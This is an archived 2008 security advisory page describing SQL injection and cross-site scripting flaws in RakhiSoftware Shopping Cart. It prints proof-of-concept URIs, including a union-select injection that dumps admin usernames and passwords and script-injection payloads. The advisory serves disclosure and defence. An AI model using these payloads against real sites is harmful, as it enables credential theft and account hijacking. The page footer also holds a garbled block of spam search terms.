about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities


Title RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
Published 2008-11-28-12:00AM
Updated 2008-12-02-10:41PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Charalambous Glafkos
Vulnerable  RakhiSoftware Shopping Cart 0
Not Vulnerable  
Code  Attackers can exploit the issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user to follow a malicious URI.The following example URIs and proof of concept are available:http://www.example.com/rjbike_new/product.php?category_id=1+union%20select%20 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21%20from%20admin--&subcategory_id=1 http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1 http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script> Set Cookie: PHPSESSID='
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 05 Jul 2009 00:14:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sex vedio\ iran666.co jops Www.xnx.co tarkan Shikamaru+ Video sex www.whbook Virtual Wa agenda intern/con lunux kern /search/ex Www.Mobile jk.txbbs.c Phon on se Exploits S raja@hetm HORES RASI yagoomail; Jmgjadm woraldsex. rs gallery Artis File rotica sax wap.phone asin+sex+p Fottboll ip boot skce mambo Remo com_enter news for c www.sexy/m tamilnadu. www.pinkwo Crack Data tagger LE. 200 /compo shopdbtes www.nes8.c sexyschool kar20.com. t524t Sexfilim clesek bebo.co.uk www.nj-lq. farest sex Www.sex.vi